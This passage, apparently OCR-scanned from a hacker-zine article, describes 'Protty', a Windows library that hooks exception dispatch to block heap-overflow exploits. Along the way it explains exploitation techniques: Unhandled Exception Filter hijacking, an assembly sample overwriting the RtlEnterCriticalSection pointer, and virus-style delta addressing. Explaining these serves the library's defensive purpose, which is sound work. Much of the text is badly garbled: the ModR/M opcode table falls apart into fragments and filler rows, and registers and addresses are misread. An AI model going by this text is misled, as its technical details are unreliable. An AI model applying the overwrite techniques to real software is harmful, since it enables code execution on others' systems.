memory area like in upper cases (but in this case region size 
should be bigger). Minus value can be used for shellcodes to 
find protection occurency however if anybody wanna play... 


--- SNIP --- END OF SCHEMA. 4b 


FEATURE: Disabling SEH / Unhandled Exception Filter pointer usage. 


Description for both Prottyl (Pl) and Protty 2 (P2) 


Every time access violation exception occurs in protected program, 
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prevention mechanism tests if the currently active SEH frame points 
to writeable location, if so Protty will stop the execution. 


If UEF_HEURISTISC is set to TRUE (1) Protty will check that actual 

set Unhandled Exception Filter starts with prolog (push ebp/mov ebp, esp) 
or starts with (push esi/mov esi, [esp+8]) otherwise Protty will kill 
the application. After this condition Protty checks that currently 
active Unhandled Exception Filter is writeable if so application 

is terminated (this also stands out for the default non heuristisc 
mode). 


Why UEF? Unhandled Exception Filter is surely one of the most used 
methods within exploiting windows heap overflows. The goal of this 
method is to setup our own Unhandled Filter, then when any unhandled 
exception will occur attackers code can be executed. Normally attacker 
tries to set UEF to point to call dword ptr [edit+78h], because 

78h bytes past EDI there is a pointer to the end of the buffer. 

To get more description of this exploitation technique check point [8] 
from Reference section. 


NOTE: Maybe there should be also a low HEURISTICS mode with 
jmp dword ptr [edit+78h] / call dword ptr [edit+78h] occurency 
checker, however the first one covers them all. 


FEATURE: RtlEnterCrticialSection pointer protector 


Description for both Prottyl (P1) and Protty 2 (P2) 


Like in above paragraph, library checks if pointer to 
RtlEnterCriticalSection pointer has changed, if it did, prevention 
library immediately resets the original pointer and stops the program 
execution. 


RtlEnterCritical pointer is often used in windows heap overflows 
exploitation. 


Here is the sample attack: 


(sample scenerio of heap overflow) 

; SNIP 

; EAX, ECX are controled by attacker 

; assume: 

; ECX=O7FFDFO20h (RtlEnterCrticialSection pointer) 
; EAX=location where attacker want to jump 


mov [ecx],eax ; overwrites the pointer 
mov [eaxt+0x4],ecx ; probably causes access 
; violation 
; if so the execution is 
; returned to "EAX" 


; SNIP 


You should also notice that even when the access violation will not 
occur it doesn’t mean attackers code will be not excuted. 

Many functions (not directly) are calling RtlEnterCriticalSection 

(the address where O7FFDFO20h points), so attacker code can be 
executed for example while calling ExitProcess API. To find more 
details on this exploitation technique check point [10] from Reference 
section. 


FEATURE: position independent code, running in dynamicaly allocated memory 
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Protty library is a position independent code since it uses so called 
"delta handling". Before start of the mechanism Protty allocates memory 
at random location and copy its body there, and there it is executed. 


What is delta handling? Lets take a look at the following code: 


; SNIP 
call delta ; put delta label offset on the 
; stack 
delta: pop ebp ; ebp=now delta offset 
sub ebp offset delta ; now sub the linking value of 
--"delta” 
; SNIP 


As you can see delta handle is a numeric value which helps you with 
addressing variables/etc. especially when your code do not lay in native 
location. 


Delta handling is very common technique used by computer viruses. Here is 
a little pseudo code which shows how to use delta handling with 
addressing: 


i SNIP 
;ebp=delta handle 
mov eax,dword ptr [ebptvariablel] 
lea ebx, [ebptvariable2 
i SNIP 


= 


Of course any register (not only EBP) can be used :) 


The position independent code was done to avoid easy disabling/patching by 
the shellcode itself. 


|Description of mechanism implemented in Prottyl (P1) | 


NOTE: That all features written here were described above. 
You can find complete descriptions there (or links to them). 


Mechanism takeovers the control of KiUserExceptionDispatcher API (exported 
by NTDLL.DLL) and that’s where the main mechanism is implemented. From 
that point every exception (caused by program) is being filtered by 
our library. To be const-stricto, used mechanism only filters all Access 
Violations exceptions. When such event occurs Protty first checks if the 
active SEH (Structured Exception Handler) frame points to good location 
(not writeable) if the result is ok it continues testing, otherwise it 
terminates the application. After SEH frame checking, library checks the 
address where violation came from, if its bad (writeable) the program 
is terminated. Then it is doing the same with pointer to Unhandled 
Exception Filter. Next it checks if pointer to RtlEnterCriticalSection 
was changed (very common and useful technique for exploiting windows based 
heap overflows) and kills the application if it was (of course the pointer 
to RtlEnterCriticalSection is being reset in the termination procedure) . 
If application wasn’t signed as BAD and terminated so far, mechanism must 
check if violation was caused by reference to our protected memory 
regions, if not it just returns execution to original handler. 
Otherwise it checks if memory which caused the exception is stored 
somewhere on the stack or is writeable. If it is, program is terminated. 
When the reference to protected memory comes from GOOD location, mechanism 
resets protection of needed region and emulates the instruction which 
caused access violation exception (im using zOmbie’s LDE32 to determine 
instruction length), after the emulation, library marks requested region 
with PAGE _NOACCESS again and continues program execution. That’s all - 
for more information check the source codes attached and test it in 
action. (Take a look at the "catched shellcodes" written in next section) 
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In the time of last add-ons for the article, Phrack stuff noticed me that 
single stepping will be more good solution. I must confess it really can 
do its job in more fast way. I mark it as TODO. 


Few words about the emulation used in Pl: 


Generally I have two ways of doing it. You already know one. I’m going to 
describe another one now. 


Instead of placing jump after instruction that caused the access violation 
exception I could emulate it locally, it’s generally more slower/faster 
more weird (?), who cares (?) but it should work also. Here is the short 
description of what have to be done: 


optional algorithm replacement for second description written below) 


( 

STEP 1 —- Get instruction length, copy the instruction to local buffer 

STEP 2 Deprotect needed region 

STEP 3 —- Change the contexts, of course leave the EIP alone :)) save 
the old context somewhere 

STEP 4 —- Emulate the instruction 

STEP 5 — Update the "target" context, reset old context 

STEP 6 — Protect all regions again 

STEP 7 —- continue program execution by NtContinue() function 


And here is the more detailed description of currently used 
instruction emulation mechanism in Protty: 


STEP 1 Deprotect needed region 

STEP 2 - Get instruction length 

STEP 3 - Make the location (placed after instruction) writeable 

STEP 4 —- Save 7 bytes from there 

STEP 5 —- Patch it with jump 

STEP 6 —- use NtContinue() to continue the execution, after executing 
the first instruction, second one (placed jump) returns 
the execution to Protty. 

STEP 7 - Reset old 7 bytes to original location (un-hooking) 

STEP 8 - Mark the location (placed after instruction) as 
PAGE EXECUTE _READ (not writeable) 

TEE = 1] . 1 

STEP 9 Protect a regions again, return to "host" 


|Description of mechanism implemented in Protty2 (P2) | 


The newer version of Protty library (P2) also resides in 
KiUserExceptionDispatcher,where it filters all exceptions like the 
previous version did. So the method of SEH/UEF protection is the same as 
described in Prottyl. What is the main difference? Main difference is that 
current mechanism do not emulate instruction and do not deprotect regions. 
It works in completely different way. When some instruction (assume it is 
GOOD - stored in not writeable location) tries to access protected region 
it causes access violation. Why so? Because if you remember the ascii 
schemas most of them point to DECOY (which is not accessible memory) or 
to a minus memory location (invalid one). This causes an exception, 
normally as described earlier the mechanism should de-prot the locations 
and emulate the intruction, but not in this case. Here we are checking 
what registers were used by the instruction which caused fault, and then 
by scanning them we are checking if any of them points somewhere inside 
"DECOYS" offsets. 


How the mechanism know whats registers are used by instruction!? 
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To understand how the prevention mechanism works, the reader should 
know about so called "opcode decoding", this !IS NOT! the full tutorial 
but it describes the main things reader should know (for more check 
www.intel.com or [8]). I would also like to thank Satish K.S for 
supporting me with great information which helped me to make the 
"tutorial" suitable for human beings (chEERs ricy! :)) 


The instructions from Intel Architectur 
the general machine instruction format, 


ar ncoded by using subsets of 
like here: 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A A A Re A A A 
A76543210A76543210AT76543210AT7T6543210A8 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAA AAAAAAAA BOR BR ACRE RB AAAAAAAA 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 
A A A 
A A A 
Opcode ModR/M Byte SIB Byte 


1 or 2 Bytes 


Bach instruction consists of an Opcode, a Register and/or Address mode 
specifier (if required) consisting of the ModR/M byte and sometimes the 
scal index-base (SIB) byte, a displacement (if required), and an 
immediate data field (if required). 


ZOmbies ADE32 engine can disassembly every instruction and return the 
DISASM structure which provides information useful for us. 
Here is the structure: 


struct disasm_struct 


{ 


IN OUT BYTE disasm_defaddr; -—- specify 4 for 32-bit code 

IN OUT BYTE disasm_defdata; —- specify 4 for 32-bit code 

OUT DWORD disasm_len; —- total length of opcode or 0 

OUT DWORD disasm_flag; -—-— bitset of C_xxx 

OUT DWORD disasm_addrsize; -—- size of address (or 0 if no addr) 
OUT DWORD disasm_datasize; -—- size of data (or 0 if no data) 
OUT BYTE disasm_rep; —- REP prefix value (if C_REP) 

OUT BYTE disasm_seg; —- SEG prefix value (if C_SEG) 

OUT BYTE disasm_opcode; -- opcode value (present if no error) 
OUT BYTE disasm_opcode2; -- 2nd opcode value (if C_OPCODE2) 

OUT BYTE disasm_modrm; —--— MODRM value (if C_MODRM) 

OUT BYTE disasm_sib; -—- SIB value (if C_SIB) 

OUT BYTE disasm_addr[8]; —-- address (if disasm_addrsize!=0) 
OUT BYTE disasm_data[8]; -—- data (if disasm_datasize!=0) 

}; 
To get the registers used by the instruction, we need to check the 
disasm_modrm value. Of course there are few exceptions like one-bytes 
intructions (no ModR/M) like "lodsb/lodsw/stosb" etc.etc. Protty2 is doing 


manual check for them. 


Sometimes encoding of the ModR/M requires a SIB 


byte to fully specify the addressing form. The basetindex and scalet+tindex 
forms of a 32bit addressing require the SIB byte. This, due to lack of 

free time, wasn’t implemented in P2, however when the mechanism cannot find 
the "registers used" it does some brute-scan and check all registers in 
host context (this should cover most of the unknown-cases). 


But lets go back to ModR/M-s: 


Lets imagine we are disassembling following instruction: 
— MOV EAX,DWORD PTR DS: [EBX] 
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library 


(32- 


returned in disasm_modrm is equal to 03h. By knowing this the 
checks following table (look for 03): 


Bit Addressing Forms with the ModR/M Byte Translated Table) 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A ModR/M Byte A Src/Dst, Src/Dst Operand 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 00 A [EAX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 01 A [ECX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 02 A [EDX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 03 A [EBX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


04 


A 


--] 


=], 


EAX/AX/AL 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


05 


A 


disp32], 


EAX/AX/AL 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 06 A [ESI], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAARAAAA 
A 07 A [EDI], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 08 A [EAX], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAAAAAAAAAAA 
A 09 A [HECK], ECX/CxX/CL 
AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A OA ATED]. BCX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
x OB A. [PBK], EOx/cx ser 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A oc A [--][--], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A OD A [disp32], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A OE A [ESI], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A OF A [EDI], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 10 A [EAX], EDX/DX/DL 
AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAAAAAAAAAAA 
A 11 A [ECX], EDX/DX/DL 
AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 12 A [EDX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A ae: A [EBX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A 14 A [--][--], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 15 A [disp32], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
x 16 A [ESI], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 17 A [EDI], EDX/DX/DL 
AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAARAAAA 


A 


8 


A 


BAX 


EBX/BX/BL 


, 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


9 


A 


BCX 


EBX/BX/BL 


, 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


A 


A 


EDX 


EBX/BX/BL 


, 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


B 


A 


EBX 


, 


EBX/BX/BL 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


C 


A 


--] 


==], 


EBX/BX/BL 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
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A 1D A [disp32], EBX/BX/BL 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 1E A [ESI], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 1F A [EDI], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A 20 A [EAX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A ral A [ECX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A ae A [EDX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAARAAAA 
A 23 A [EBX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 24 A [--][--], ESP/SP/AH 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A 25 A [disp32], ESP/SP/AH 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 


A 


26 


A 


ESI 


, 


ES 


P/S 


P/A 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


27 


A 


EDI 


ES 


, 


P/S 


P/A 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


28 


A 


BAX 


EB 


, 


P/B 


P/C 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


29 


A 


A ECX], EBP/BP/C 
AAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAARAAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 2A A [EDX], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 2B A [EBX], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A IC A [--][--], EBP/BP/CH 
AAAAAAAAAAARAAAAAAAAAAAAARAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAARAAAA 
x 2D A [disp32], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 2E A [ESI], EBP/BP/CH 
AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 2F A [EDI], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A 30 A [EAX], ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 31 A [ECX], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 32 A [EDX], ESI/SI/DH 
AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 33 A [EBX], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 34 A [-=[1-=]) ESI /S1 DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 35 A [disp32], ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 36 A [ESI], ESI/SI/D 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 37 A [EDI], ESI/SI/DH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 38 A [EAX], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 39 A [ECX], EDI/DI/BH 
AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A 3A A [EDX], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 3B A [EBX], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAA 
A 3c A fs=] 1-1, EDI/DT/ BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 3D A [disp32], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 3E A [ESI], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 


ea 


5 
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A 3F A [EDI], EDI/DI/BH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 40 A [disp8+EAX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 4l A [disp8+ECX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 42 A [disp8+EDX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 43 A [disp8+EBX], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 44 A [disp8+[--][--]], EAX/AX/AL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


vA 


5 


A 


disp8 


E BP 


EAX/AX/Al 


, 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


vA 


6 


A 


disp8 


ESI 


EAX/AX/Al 


, 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


q 


7 


A 


disp8 


EDI 


EAX/AX/Al 


, 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


q 


8 


A 


BAX 


disp8 


, 


ECX/CX/Cl 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


vA 


9 


A 


BCX 


disp8 


, 


ECX/CX/CL 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


vA 


A 


A 


EDX 


disp8 


, 


ECX/CX/Cl 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


q 


B 


A 


EBX 


ECX/CX/Cl 


disp8 


, 


Li 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


q 


C 


A 


disp8 


+[-- 


[--]], 


ECX/CX/CL 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A AD A [disp8+EBP], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 4E A [disp8+ESI], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 4F A [disp8+EDI], ECX/CX/CL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 50 A [disp8+EAX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 51 A [disp8+ECX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 52 A [disp8+EDX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 53 A [disp8+EBX], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 54 A [disp8+[--] [--]], EDX/DX/DL 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 55 A [disp8+EBP], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 56 A [disp8+ESI], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 57 A [disp8+EDI], EDX/DX/DL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 58 A [disp8+EAX], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 59 A [disp8+ECX], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


5A 


A 


disp84 


EDX 


Ty 


EBX/BX/BL 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


5B 


A 


disp8 


EBX 


Ty 


EBX/BX/BL 


AAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 5c A [disp8+[--][--]], EBX/BX/BL 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A 5D A [disp8+EBP], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAAAAAA 
A 5E A [disp8+ESI], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 
A SF A [disp8+EDI], EBX/BX/BL 
AAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAARAAAAAAAAAAAARAAAAAAAARAAAARAAAA 


A 


60 


A 


BAX 


disp8 


, ESP/SP/AH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
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A 61 A [disp8+ECX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 62 A [disp8+EDX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 63 A [disp8+EBX], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 64 A [disp8+[--][--]], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 65 A [disp8+EBP], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 66 A [disp8tESI], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 67 A [disp8+EDI], ESP/SP/AH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 68 A [disp8+EAX], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


69 


A 


disp8+tECx], 


EBP/BP/CH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


6A 


A 


disp8+EDX], 


EBP/BP/CH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


A 


6B 


A 


disp8+EBXx], 


EBP/BP/CH 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 6C A [disp8+[--][--]], EBP/BP/CH 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 6D A [disp8+EBP], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 6E A [disp8+ESI], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 6F A [disp8+EDI], EBP/BP/CH 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A 70 A [disp8+EAX], ESI/SI/D 
